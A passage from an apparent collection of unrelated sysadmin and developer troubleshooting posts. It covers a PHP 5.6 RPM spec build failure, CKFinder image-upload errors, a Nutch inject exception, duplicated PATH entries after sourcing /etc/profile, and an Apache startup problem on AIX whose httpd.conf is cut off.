/usr/local/php5.6/lib/php/test/Structures_Graph/tests/*
/usr/local/php5.6/lib/php/test/XML_Util/*
/usr/local/php5.6/lib/php/test/XML_Util/tests/*
/usr/local/php5.6/lib/php/Structures/*
/usr/local/php5.6/lib/php/Structures/Graph/*
/usr/local/php5.6/lib/php/Structures/Graph/Manipulator/*
/usr/local/php5.6/lib/php/XML/*
/usr/local/php5.6/lib/php/OS/*
/usr/local/php5.6/lib/php/PEAR/*
/usr/local/php5.6/lib/php/PEAR/ChannelFile/*
/usr/local/php5.6/lib/php/PEAR/Command/*
/usr/local/php5.6/lib/php/PEAR/Downloader/*
/usr/local/php5.6/lib/php/PEAR/Frontend/*
/usr/local/php5.6/lib/php/PEAR/Installer/*
/usr/local/php5.6/lib/php/PEAR/Installer/Role/*
/usr/local/php5.6/lib/php/PEAR/PackageFile/*
/usr/local/php5.6/lib/php/PEAR/PackageFile/Generator/*
/usr/local/php5.6/lib/php/PEAR/PackageFile/Parser/*
/usr/local/php5.6/lib/php/PEAR/PackageFile/v2/*
/usr/local/php5.6/lib/php/PEAR/REST/*
/usr/local/php5.6/lib/php/PEAR/Task/*
/usr/local/php5.6/lib/php/PEAR/Task/Postinstallscript/*
/usr/local/php5.6/lib/php/PEAR/Task/Replace/*
/usr/local/php5.6/lib/php/PEAR/Task/Unixeol/*
/usr/local/php5.6/lib/php/PEAR/Task/Windowseol/*
/usr/local/php5.6/lib/php/PEAR/Validator/*
/usr/local/php5.6/lib/php/data/*
/usr/local/php5.6/lib/php/data/PEAR/*
%config /usr/local/php5.6/etc/*
/usr/local/php5.6/var/run/*
/usr/local/php5.6/lib/*
%dir /usr/local/php5.6/var/log/

%post
cp /usr/local/php5.6/etc/php-fpm.conf.default /usr/local/php5.6/etc/php-fpm.conf
ln -s /usr/local/php5.6/bin/php /usr/bin/php

%changelog
* Tue Aug 30 2016 Kevin<kevin_liao@163.com> 5.6.25
- first rpm from php-5.6.25
```

Then, as a regular (non-root) user named centos, I ran:

```
$ rpmbuild -ba rpmbuild/SPECS/php.spec
```

which fails at the end with:

```
Build complete.
Don't forget to run 'make test'.
+ exit 0
Executing(%install): /bin/sh -e /var/tmp/rpm-tmp.QjJHDq
+ umask 022
+ cd /home/centos/rpmbuild/BUILD
+ '[' /home/centos/rpmbuild/BUILDROOT/php-5.6.25-1.el7.centos.x86_64 '!=' / ']'
+ rm -rf /home/centos/rpmbuild/BUILDROOT/php-5.6.25-1.el7.centos.x86_64
++ dirname /home/centos/rpmbuild/BUILDROOT/php-5.6.25-1.el7.centos.x86_64
+ mkdir -p /home/centos/rpmbuild/BUILDROOT
+ mkdir /home/centos/rpmbuild/BUILDROOT/php-5.6.25-1.el7.centos.x86_64
+ cd php-5.6.25
+ rm -rf /home/centos/rpmbuild/BUILDROOT/php-5.6.25-1.el7.centos.x86_64
+ make install DESTDIR=/home/centos/rpmbuild/BUILDROOT/php-5.6.25-1.el7.centos.x86_64
Installing shared extensions: /usr/local/php5.6/lib/php/extensions/no-debug-non-zts-20131226/
Installing PHP CLI binary: /usr/local/php5.6/bin/
Installing PHP CLI man page: /usr/local/php5.6/php/man/man1/
Installing PHP FPM binary: /usr/local/php5.6/sbin/
Installing PHP FPM config: /usr/local/php5.6/etc/
Installing PHP FPM man page: /usr/local/php5.6/php/man/man8/
Installing PHP FPM status page: /usr/local/php5.6/php/php/fpm/
Installing PHP CGI binary: /usr/local/php5.6/bin/
Installing PHP CGI man page: /usr/local/php5.6/php/man/man1/
Installing build environment: /usr/local/php5.6/lib/php/build/
Installing header files: /usr/local/php5.6/include/php/
Installing helper programs: /usr/local/php5.6/bin/
  program: phpize
  program: php-config
Installing man pages: /usr/local/php5.6/php/man/man1/
  page: phpize.1
  page: php-config.1
Installing PEAR environment: /usr/local/php5.6/lib/php/
[PEAR] Archive_Tar - already installed: 1.4.0
[PEAR] Console_Getopt - already installed: 1.4.1
[PEAR] Structures_Graph- already installed: 1.1.1
[PEAR] XML_Util - already installed: 1.3.0
[PEAR] PEAR - already installed: 1.10.1
Wrote PEAR system config file at: /usr/local/php5.6/etc/pear.conf
You may want to add: /usr/local/php5.6/lib/php to your php.ini include_path
/home/centos/rpmbuild/BUILD/php-5.6.25/build/shtool install -c ext/phar/phar.phar /usr/local/php5.6/bin
ln -s -f phar.phar /usr/local/php5.6/bin/phar
Installing PDO headers: /usr/local/php5.6/include/php/ext/pdo/
+ /usr/lib/rpm/find-debuginfo.sh --strict-build-id -m --run-dwz --dwz-low-mem-die-limit 10000000 --dwz-max-die-limit 110000000 /home/centos/rpmbuild/BUILD/php-5.6.25
find: '/home/centos/rpmbuild/BUILDROOT/php-5.6.25-1.el7.centos.x86_64': No such file or directory
error: Bad exit status from /var/tmp/rpm-tmp.QjJHDq (%install)

RPM build errors:
    Bad exit status from /var/tmp/rpm-tmp.QjJHDq (%install)
```
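The log itself points at the cause: `%install` ran `make install DESTDIR=%{buildroot}`, but PHP's generated Makefile honors `INSTALL_ROOT` rather than `DESTDIR`, so everything was installed straight into the live `/usr/local/php5.6` ("Installing PHP CLI binary: /usr/local/php5.6/bin/") and the freshly created BUILDROOT directory, which the preceding `rm -rf %{buildroot}` had deleted, was never repopulated; `find-debuginfo.sh` then fails because that directory no longer exists. A sketch of the corrected `%install` section:

```
%install
rm -rf %{buildroot}
# PHP's Makefile uses INSTALL_ROOT instead of the more common DESTDIR
make install INSTALL_ROOT=%{buildroot}
```

With the files staged under `%{buildroot}`, the `%files` paths should then resolve and the debuginfo step should find the tree it expects.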
CKFinder under Java: some image uploads fail with "The requested operation could not be completed due to a file system limitation"
**1. Problem:** With **CKFinder** running under **Java**, **uploading some images** fails with "The requested operation could not be completed due to a file system limitation". Some images upload successfully; others fail with that error.

**2. ckfinder.xml**

```
<config>
  <enabled>true</enabled>
  <baseDir></baseDir>
  <baseURL>/userfiles/</baseURL>
  <licenseKey></licenseKey>
  <licenseName></licenseName>
  <imgWidth>2000</imgWidth>
  <imgHeight>2000</imgHeight>
  <imgQuality>80</imgQuality>
  <uriEncoding>UTF-8</uriEncoding>
  <forceASCII>false</forceASCII>
  <disallowUnsafeCharacters>false</disallowUnsafeCharacters>
  <userRoleSessionVar>CKFinder_UserRole</userRoleSessionVar>
  <checkDoubleExtension>true</checkDoubleExtension>
  <checkSizeAfterScaling>true</checkSizeAfterScaling>
  <secureImageUploads>true</secureImageUploads>
  <htmlExtensions>html,htm,xml,js</htmlExtensions>
  <hideFolders>
    <folder>.*</folder>
    <folder>CVS</folder>
  </hideFolders>
  <hideFiles>
    <file>.*</file>
  </hideFiles>
  <defaultResourceTypes></defaultResourceTypes>
  <types>
    <type name="files">
      <url>%BASE_URL%files/</url>
      <directory>%BASE_DIR%files</directory>
      <maxSize>400M</maxSize>
      <allowedExtensions>7z,aiff,asf,avi,bmp,csv,doc,docx,fla,flv,gif,gz,gzip,jpeg,jpg,mid,mov,mp3,mp4,mpc,mpeg,mpg,ods,odt,pdf,png,ppt,pptx,pxd,qt,ram,rar,rm,rmi,rmvb,rtf,sdc,sitd,swf,sxc,sxw,tar,tgz,tif,tiff,txt,vsd,wav,wma,wmv,xls,xlsx,zip</allowedExtensions>
      <deniedExtensions></deniedExtensions>
    </type>
    <type name="images">
      <url>%BASE_URL%images/</url>
      <directory>%BASE_DIR%images</directory>
      <maxSize>400M</maxSize>
      <allowedExtensions>bmp,gif,jpeg,jpg,png</allowedExtensions>
      <deniedExtensions></deniedExtensions>
    </type>
    <type name="flash">
      <url>%BASE_URL%flash/</url>
      <directory>%BASE_DIR%flash</directory>
      <maxSize>400M</maxSize>
      <allowedExtensions>swf,flv</allowedExtensions>
      <deniedExtensions></deniedExtensions>
    </type>
    <type name="resfile">
      <url>%BASE_URL%resfile/</url>
      <directory>%BASE_DIR%resfile</directory>
      <maxSize>400M</maxSize>
      <allowedExtensions>swf,flv,pdf,xls,xlsx,mp4</allowedExtensions>
      <deniedExtensions></deniedExtensions>
    </type>
  </types>
  <accessControls>
    <accessControl>
      <role>*</role>
      <resourceType>*</resourceType>
      <folder>/</folder>
      <folderView>true</folderView>
      <folderCreate>true</folderCreate>
      <folderRename>true</folderRename>
      <folderDelete>true</folderDelete>
      <fileView>true</fileView>
      <fileUpload>true</fileUpload>
      <fileRename>true</fileRename>
      <fileDelete>true</fileDelete>
    </accessControl>
  </accessControls>
  <thumbs>
    <enabled>true</enabled>
    <url>%BASE_URL%_thumbs/</url>
    <directory>%BASE_DIR%_thumbs</directory>
    <directAccess>true</directAccess>
    <maxWidth>550</maxWidth>
    <maxHeight>310</maxHeight>
    <quality>80</quality>
  </thumbs>
  <plugins>
    <plugin>
      <name>imageresize</name>
      <class>com.ckfinder.connector.plugins.ImageResize</class>
      <params>
        <param name="smallThumb" value="90x90"></param>
        <param name="mediumThumb" value="120x120"></param>
        <param name="largeThumb" value="180x180"></param>
      </params>
    </plugin>
    <plugin>
      <name>fileeditor</name>
      <class>com.ckfinder.connector.plugins.FileEditor</class>
      <params></params>
    </plugin>
  </plugins>
  <basePathBuilderImpl>com.ckfinder.connector.configuration.ConfigurationPathBuilder</basePathBuilderImpl>
</config>
```

3. Screenshot of a failed upload:

![screenshot](https://img-ask.csdn.net/upload/201908/05/1564989151_68525.jpg)

Screenshot of a successful upload:

![screenshot](https://img-ask.csdn.net/upload/201908/05/1564989400_818875.jpg)
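One pattern that matches "some images fail, others succeed" is a server-side decoding failure rather than a size or extension limit: with `secureImageUploads` and `checkSizeAfterScaling` set to `true`, the connector re-decodes every uploaded image, and files that Java's ImageIO cannot decode (a CMYK JPEG exported from Photoshop is the classic case) get rejected even though they look like ordinary .jpg files. This is a hypothesis, not something the screenshots prove; a quick way to test it is to feed a failing file's bytes to `ImageIO.read` on the same JVM:

```java
import java.awt.image.BufferedImage;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import javax.imageio.ImageIO;

public class ImageDecodeCheck {
    /** Returns true if this JVM's ImageIO can decode the given image bytes. */
    static boolean canDecode(byte[] data) {
        try {
            // ImageIO.read returns null when no registered reader handles the
            // format, and throws for corrupt/unsupported streams (e.g. CMYK JPEG).
            BufferedImage img = ImageIO.read(new ByteArrayInputStream(data));
            return img != null;
        } catch (Exception e) {
            return false;
        }
    }

    public static void main(String[] args) throws Exception {
        // Sanity check with a tiny generated PNG; to test a real upload,
        // read its bytes with java.nio.file.Files.readAllBytes and pass them in.
        BufferedImage src = new BufferedImage(4, 4, BufferedImage.TYPE_INT_RGB);
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        ImageIO.write(src, "png", out);
        System.out.println("decodable: " + canDecode(out.toByteArray()));
    }
}
```

If `canDecode` returns false for exactly the files that fail to upload, re-saving them in RGB (or adding a CMYK-capable ImageIO reader such as the TwelveMonkeys plugin to the webapp) would be the thing to try.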
Nutch + MongoDB + ElasticSearch + Kibana: exception on the inject step
I set up a Nutch+MongoDB+ElasticSearch+Kibana environment on Linux; Nutch was compiled from the apache-nutch-2.3.1-src.tar.gz sources. I followed http://blog.csdn.net/github_27609763/article/details/50597427 for the setup, but running ./bin/nutch inject urls/ fails with the error below. Any help would be greatly appreciated. The configuration is as follows.

nutch-site.xml:
```
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="configuration.xsl"?>
<!--
 Licensed to the Apache Software Foundation (ASF) under one or more
 contributor license agreements.  See the NOTICE file distributed with
 this work for additional information regarding copyright ownership.
 The ASF licenses this file to You under the Apache License, Version 2.0
 (the "License"); you may not use this file except in compliance with
 the License.  You may obtain a copy of the License at

     http://www.apache.org/licenses/LICENSE-2.0

 Unless required by applicable law or agreed to in writing, software
 distributed under the License is distributed on an "AS IS" BASIS,
 WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 See the License for the specific language governing permissions and
 limitations under the License.
-->
<!-- Put site-specific property overrides in this file. -->
<configuration>
  <property>
    <name>storage.data.store.class</name>
    <value>org.apache.gora.mongodb.store.MongoStore</value>
    <description>Default class for storing data</description>
  </property>
  <property>
    <name>http.agent.name</name>
    <value>Hist Crawler</value>
  </property>
  <property>
    <name>plugin.includes</name>
    <value>protocol-(http|httpclient)|urlfilter-regex|index-(basic|more)|query-(basic|site|url|lang)|indexer-elastic|nutch-extensionpoints|parse-(text|html|msexcel|msword|mspowerpoint|pdf)|summary-basic|scoring-opic|urlnormalizer-(pass|regex|basic)|parse-(html|tika|metatags)|index-(basic|anchor|more|metadata)</value>
  </property>
  <property>
    <name>elastic.host</name>
    <value>localhost</value>
  </property>
  <property>
    <name>elastic.cluster</name>
    <value>hist</value>
  </property>
  <property>
    <name>elastic.index</name>
    <value>nutch</value>
  </property>
  <property>
    <name>parser.character.encoding.default</name>
    <value>utf-8</value>
  </property>
  <property>
    <name>http.content.limit</name>
    <value>6553600</value>
  </property>
</configuration>
```
regex-urlfilter.txt:
```
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements.  See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License.  You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

# The default url filter.
# Better for whole-internet crawling.

# Each non-comment, non-blank line contains a regular expression
# prefixed by '+' or '-'.  The first matching pattern in the file
# determines whether a URL is included or ignored.  If no pattern
# matches, the URL is ignored.

# skip file: ftp: and mailto: urls
-^(file|ftp|mailto):

# skip image and other suffixes we can't yet parse
# for a more extensive coverage use the urlfilter-suffix plugin
-\.(gif|GIF|jpg|JPG|png|PNG|ico|ICO|css|CSS|sit|SIT|eps|EPS|wmf|WMF|zip|ZIP|ppt|PPT|mpg|MPG|xls|XLS|gz|GZ|rpm|RPM|tgz|TGZ|mov|MOV|exe|EXE|jpeg|JPEG|bmp|BMP|js|JS)$

# skip URLs containing certain characters as probable queries, etc.
-[?*!@=]

# skip URLs with slash-delimited segment that repeats 3+ times, to break loops
-.*(/[^/]+)/[^/]+\1/[^/]+\1/

# accept anything else
+^http://([a-z0-9]*\.)*nutch.apache.org/
# +.
```
seed.txt under urls/ contains:
```
[root@jdu4e00u53f7 urls]# pwd
/chen/nutch/runtime/local/urls
[root@jdu4e00u53f7 urls]# cat seed.txt
http://blog.csdn.net/
[root@jdu4e00u53f7 urls]#
```
Finally, the error output:
```
2017-09-25 23:35:17,648 INFO  crawl.InjectorJob - InjectorJob: starting at 2017-09-25 23:35:17
2017-09-25 23:35:17,649 INFO  crawl.InjectorJob - InjectorJob: Injecting urlDir: urls
2017-09-25 23:35:18,058 WARN  util.NativeCodeLoader - Unable to load native-hadoop library for your platform... using builtin-java classes where applicable
2017-09-25 23:35:19,115 INFO  crawl.InjectorJob - InjectorJob: Using class org.apache.gora.mongodb.store.MongoStore as the Gora storage class.
2017-09-25 23:35:20,006 WARN  conf.Configuration - file:/tmp/hadoop-root/mapred/staging/root1639902035/.staging/job_local1639902035_0001/job.xml:an attempt to override final parameter: mapreduce.job.end-notification.max.retry.interval; Ignoring.
2017-09-25 23:35:20,009 WARN  conf.Configuration - file:/tmp/hadoop-root/mapred/staging/root1639902035/.staging/job_local1639902035_0001/job.xml:an attempt to override final parameter: mapreduce.job.end-notification.max.attempts; Ignoring.
2017-09-25 23:35:20,172 WARN  conf.Configuration - file:/tmp/hadoop-root/mapred/local/localRunner/root/job_local1639902035_0001/job_local1639902035_0001.xml:an attempt to override final parameter: mapreduce.job.end-notification.max.retry.interval; Ignoring.
2017-09-25 23:35:20,175 WARN  conf.Configuration - file:/tmp/hadoop-root/mapred/local/localRunner/root/job_local1639902035_0001/job_local1639902035_0001.xml:an attempt to override final parameter: mapreduce.job.end-notification.max.attempts; Ignoring.
2017-09-25 23:35:20,504 WARN  mapred.LocalJobRunner - job_local1639902035_0001
java.lang.Exception: java.lang.RuntimeException: x point org.apache.nutch.net.URLNormalizer not found.
	at org.apache.hadoop.mapred.LocalJobRunner$Job.runTasks(LocalJobRunner.java:462)
	at org.apache.hadoop.mapred.LocalJobRunner$Job.run(LocalJobRunner.java:522)
Caused by: java.lang.RuntimeException: x point org.apache.nutch.net.URLNormalizer not found.
	at org.apache.nutch.net.URLNormalizers.<init>(URLNormalizers.java:141)
	at org.apache.nutch.crawl.InjectorJob$UrlMapper.setup(InjectorJob.java:94)
	at org.apache.hadoop.mapreduce.Mapper.run(Mapper.java:142)
	at org.apache.hadoop.mapred.MapTask.runNewMapper(MapTask.java:764)
	at org.apache.hadoop.mapred.MapTask.run(MapTask.java:340)
	at org.apache.hadoop.mapred.LocalJobRunner$Job$MapTaskRunnable.run(LocalJobRunner.java:243)
	at java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)
	at java.util.concurrent.FutureTask.run(FutureTask.java:266)
	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
	at java.lang.Thread.run(Thread.java:748)
2017-09-25 23:35:21,198 ERROR crawl.InjectorJob - InjectorJob: java.lang.RuntimeException: job failed: name=apache-nutch-2.3.1.jar, jobid=job_local1639902035_0001
	at org.apache.nutch.util.NutchJob.waitForCompletion(NutchJob.java:120)
	at org.apache.nutch.crawl.InjectorJob.run(InjectorJob.java:231)
	at org.apache.nutch.crawl.InjectorJob.inject(InjectorJob.java:252)
	at org.apache.nutch.crawl.InjectorJob.run(InjectorJob.java:275)
	at org.apache.hadoop.util.ToolRunner.run(ToolRunner.java:70)
	at org.apache.nutch.crawl.InjectorJob.main(InjectorJob.java:284)
```
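The stack trace pins the failure on the extension point `org.apache.nutch.net.URLNormalizer`, which Nutch resolves from the plugins selected by `plugin.includes`. A common cause is a `plugin.includes` value whose `|` separators were mangled during copy-editing, so no plugin matches the expression and the urlnormalizer plugins never load. As a hedged sketch (assuming the stock Nutch 2.3.1 plugin names), a minimal value that keeps the inject step working might look like:

```
<property>
  <name>plugin.includes</name>
  <!-- The value is one |-separated regular expression. The urlnormalizer-*
       group is what InjectorJob needs to resolve URLNormalizer. -->
  <value>protocol-httpclient|urlfilter-regex|urlnormalizer-(pass|regex|basic)|parse-(html|tika|metatags)|index-(basic|anchor|more)|indexer-elastic|scoring-opic</value>
</property>
```

Note that if you edit the property under the source tree's conf/ rather than runtime/local/conf/, you need to rerun `ant runtime` for the change to take effect.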
Running `source /etc/profile` on Linux produces the following output
declare -x CLASSPATH=".:/usr/local/java/jdk1.8.0_191//lib/dt.jar:/usr/local/java/jdk1.8.0_191//lib/tools.jar:/usr/local/java/jdk1.8.0_191/jre//lib:.:/usr/local/java/jdk1.8.0_191//lib/dt.jar:/usr/local/java/jdk1.8.0_191//lib/tools.jar:/usr/local/java/jdk1.8.0_191/jre//lib:"
declare -x DISPLAY="localhost:10.0"
declare -x HADOOP_HOME="/usr/local/hadoop/hadoop-2.8.5/"
declare -x HISTCONTROL="ignoredups"
declare -x HISTSIZE="1000"
declare -x HIVE_HOME="/usr/local/hive"
declare -x HOME="/root"
declare -x HOSTNAME="hadoop01"
declare -x JAVA_HOME="/usr/local/java/jdk1.8.0_191/"
declare -x JRE_HOME="/usr/local/java/jdk1.8.0_191/jre/"
declare -x LANG="zh_CN.UTF-8"
declare -x LESSOPEN="||/usr/bin/lesspipe.sh %s"
declare -x LOGNAME="root"
declare -x LS_COLORS="rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=01;05;37;41:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.axv=01;35:*.anx=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=01;36:*.au=01;36:*.flac=01;36:*.mid=01;36:*.midi=01;36:*.mka=01;36:*.mp3=01;36:*.mpc=01;36:*.ogg=01;36:*.ra=01;36:*.wav=01;36:*.axa=01;36:*.oga=01;36:*.spx=01;36:*.xspf=01;36:"
declare -x MAIL="/var/spool/mail/root"
declare -x OLDPWD="/root"
declare -x PATH="/usr/local/hive/bin:/usr/local/hive/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/usr/local/java/jdk1.8.0_191//bin:/usr/local/hadoop/hadoop-2.8.5//bin:/usr/local/hadoop/hadoop-2.8.5//sbin::/root/bin:/usr/local/java/jdk1.8.0_191//bin:/usr/local/java/jdk1.8.0_191/jre//bin:/usr/local/hadoop/hadoop-2.8.5//bin:/usr/local/hadoop/hadoop-2.8.5//sbin:"
declare -x PWD="/usr/local/hadoop/hadoop-2.8.5"
declare -x SELINUX_LEVEL_REQUESTED=""
declare -x SELINUX_ROLE_REQUESTED=""
declare -x SELINUX_USE_CURRENT_RANGE=""
declare -x SHELL="/bin/bash"
declare -x SHLVL="1"
declare -x SSH_CLIENT="192.168.240.1 52834 22"
declare -x SSH_CONNECTION="192.168.240.1 52834 192.168.240.131 22"
declare -x SSH_TTY="/dev/pts/0"
declare -x TERM="xterm"
declare -x USER="root"
declare -x XDG_DATA_DIRS="/root/.local/share/flatpak/exports/share:/var/lib/flatpak/exports/share:/usr/local/share:/usr/share"
declare -x XDG_RUNTIME_DIR="/run/user/0"
declare -x XDG_SESSION_ID="1"
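The output itself is normal `export -p` output, but note that PATH and CLASSPATH contain every JDK and Hadoop directory twice: each time /etc/profile is sourced, its unconditional `PATH=$PATH:...` lines append the same entries again. A minimal sketch of the effect and of an idempotent guard (the JAVA_HOME value is illustrative):

```shell
#!/bin/sh
# Demonstrates why re-sourcing a profile duplicates PATH entries,
# and a POSIX guard that makes the append idempotent.
JAVA_HOME=/usr/local/java/jdk1.8.0_191

# Unguarded append -- each `source` adds another copy:
PATH=/usr/bin:/bin
PATH="$PATH:$JAVA_HOME/bin"
PATH="$PATH:$JAVA_HOME/bin"
echo "unguarded: $PATH"

# Guarded append -- adds the entry only if it is not already present:
PATH=/usr/bin:/bin
append_path() {
    case ":$PATH:" in
        *":$1:"*) ;;              # already on PATH, do nothing
        *) PATH="$PATH:$1" ;;
    esac
}
append_path "$JAVA_HOME/bin"
append_path "$JAVA_HOME/bin"
echo "guarded:   $PATH"
```

The duplicates are harmless for lookup (the first match wins) but make the environment hard to read; the guard keeps repeated `source /etc/profile` runs from growing PATH.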
Seeking advice on an Apache restart problem
AIX Version 5环境 <br />不是自带的apache <br />用apachectl start启动的时候 <br />没有显示错误 <br />实际没有启动 <br />原因:http://192.168.108.12:8081/ 连接失败 <br /> <br />httpd -t 测试结果 ok! <br /> <br />httpd.conf内容如下 <br />------------------------ <br /># <br /># Based upon the NCSA server configuration files originally by Rob McCool. <br /># <br /># This is the main Apache server configuration file.  It contains the <br /># configuration directives that give the server its instructions. <br /># See &lt;url:http: httpd.apache.org="" docs="" 2.0=""/&gt; for detailed information about <br /># the directives. <br /># <br /># Do NOT simply read the instructions in here without understanding <br /># what they do.  They're here only as hints or reminders.  If you are unsure <br /># consult the online docs. You have been warned.  <br /># <br /># The configuration directives are grouped into three basic sections: <br />#  1. Directives that control the operation of the Apache server process as a <br />#     whole (the 'global environment'). <br />#  2. Directives that define the parameters of the 'main' or 'default' server, <br />#     which responds to requests that aren't handled by a virtual host. <br />#     These directives also provide default values for the settings <br />#     of all virtual hosts. <br />#  3. Settings for virtual hosts, which allow Web requests to be sent to <br />#     different IP addresses or hostnames and have them handled by the <br />#     same Apache server process. <br /># <br /># Configuration and logfile names: If the filenames you specify for many <br /># of the server's control files begin with "/" (or "drive:/" for Win32), the <br /># server will use that explicit path.  If the filenames do *not* begin <br /># with "/", the value of ServerRoot is prepended -- so "logs/foo.log" <br /># with ServerRoot set to "/home/weblogic/apache/" will be interpreted by the <br /># server as "/home/weblogic/apache//logs/foo.log". 
<br /># <br /> <br />### Section 1: Global Environment <br /># <br /># The directives in this section affect the overall operation of Apache, <br /># such as the number of concurrent requests it can handle or where it <br /># can find its configuration files. <br /># <br /> <br /># <br /># ServerRoot: The top of the directory tree under which the server's <br /># configuration, error, and log files are kept. <br /># <br /># NOTE!  If you intend to place this on an NFS (or otherwise network) <br /># mounted filesystem then please read the LockFile documentation (available <br /># at &lt;url:http: httpd.apache.org="" docs="" 2.0="" mod="" mpm_common.html#lockfile=""&gt;); <br /># you will save yourself a lot of trouble. <br /># <br /># Do NOT add a slash at the end of the directory path. <br /># <br />ServerRoot "/home/weblogic/apache/" <br /> <br /># <br /># The accept serialization lock file MUST BE STORED ON A LOCAL DISK. <br /># <br />&lt;ifmodule !mpm_winnt.c=""&gt; <br />&lt;ifmodule !mpm_netware.c=""&gt; <br />#LockFile logs/accept.lock <br />&lt;/ifmodule&gt; <br />&lt;/ifmodule&gt; <br /> <br /># <br /># ScoreBoardFile: File used to store internal server process information. <br /># If unspecified (the default), the scoreboard will be stored in an <br /># anonymous shared memory segment, and will be unavailable to third-party <br /># applications. <br /># If specified, ensure that no two invocations of Apache share the same <br /># scoreboard file. The scoreboard file MUST BE STORED ON A LOCAL DISK. <br /># <br />&lt;ifmodule !mpm_netware.c=""&gt; <br />&lt;ifmodule !perchild.c=""&gt; <br />#ScoreBoardFile logs/apache_runtime_status <br />&lt;/ifmodule&gt; <br />&lt;/ifmodule&gt; <br /> <br /> <br /># <br /># PidFile: The file in which the server should record its process <br /># identification number when it starts. 
<br /># <br />&lt;ifmodule !mpm_netware.c=""&gt; <br />PidFile logs/httpd.pid <br />&lt;/ifmodule&gt; <br /> <br /># <br /># Timeout: The number of seconds before receives and sends time out. <br /># <br />Timeout 300 <br /> <br /># <br /># KeepAlive: Whether or not to allow persistent connections (more than <br /># one request per connection). Set to "Off" to deactivate. <br /># <br />KeepAlive On <br /> <br /># <br /># MaxKeepAliveRequests: The maximum number of requests to allow <br /># during a persistent connection. Set to 0 to allow an unlimited amount. <br /># We recommend you leave this number high, for maximum performance. <br /># <br />MaxKeepAliveRequests 100 <br /> <br /># <br /># KeepAliveTimeout: Number of seconds to wait for the next request from the <br /># same client on the same connection. <br /># <br />KeepAliveTimeout 15 <br /> <br />## <br />## Server-Pool Size Regulation (MPM specific) <br />## <br /> <br /># prefork MPM <br /># StartServers: number of server processes to start <br /># MinSpareServers: minimum number of server processes which are kept spare <br /># MaxSpareServers: maximum number of server processes which are kept spare <br /># MaxClients: maximum number of server processes allowed to start <br /># MaxRequestsPerChild: maximum number of requests a server process serves <br />&lt;ifmodule prefork.c=""&gt; <br />StartServers         5 <br />MinSpareServers      5 <br />MaxSpareServers     10 <br />MaxClients         150 <br />MaxRequestsPerChild  0 <br />&lt;/ifmodule&gt; <br /> <br /># worker MPM <br /># StartServers: initial number of server processes to start <br /># MaxClients: maximum number of simultaneous client connections <br /># MinSpareThreads: minimum number of worker threads which are kept spare <br /># MaxSpareThreads: maximum number of worker threads which are kept spare <br /># ThreadsPerChild: constant number of worker threads in each server process <br /># MaxRequestsPerChild: maximum number of requests a 
server process serves <br />&lt;ifmodule worker.c=""&gt; <br />StartServers         2 <br />MaxClients         150 <br />MinSpareThreads     25 <br />MaxSpareThreads     75 <br />ThreadsPerChild     25 <br />MaxRequestsPerChild  0 <br />&lt;/ifmodule&gt; <br /> <br /># perchild MPM <br /># NumServers: constant number of server processes <br /># StartThreads: initial number of worker threads in each server process <br /># MinSpareThreads: minimum number of worker threads which are kept spare <br /># MaxSpareThreads: maximum number of worker threads which are kept spare <br /># MaxThreadsPerChild: maximum number of worker threads in each server process <br /># MaxRequestsPerChild: maximum number of connections per server process <br />&lt;ifmodule perchild.c=""&gt; <br />NumServers           5 <br />StartThreads         5 <br />MinSpareThreads      5 <br />MaxSpareThreads     10 <br />MaxThreadsPerChild  20 <br />MaxRequestsPerChild  0 <br />&lt;/ifmodule&gt; <br /> <br /># WinNT MPM <br /># ThreadsPerChild: constant number of worker threads in the server process <br /># MaxRequestsPerChild: maximum  number of requests a server process serves <br />&lt;ifmodule mpm_winnt.c=""&gt; <br />ThreadsPerChild 250 <br />MaxRequestsPerChild  0 <br 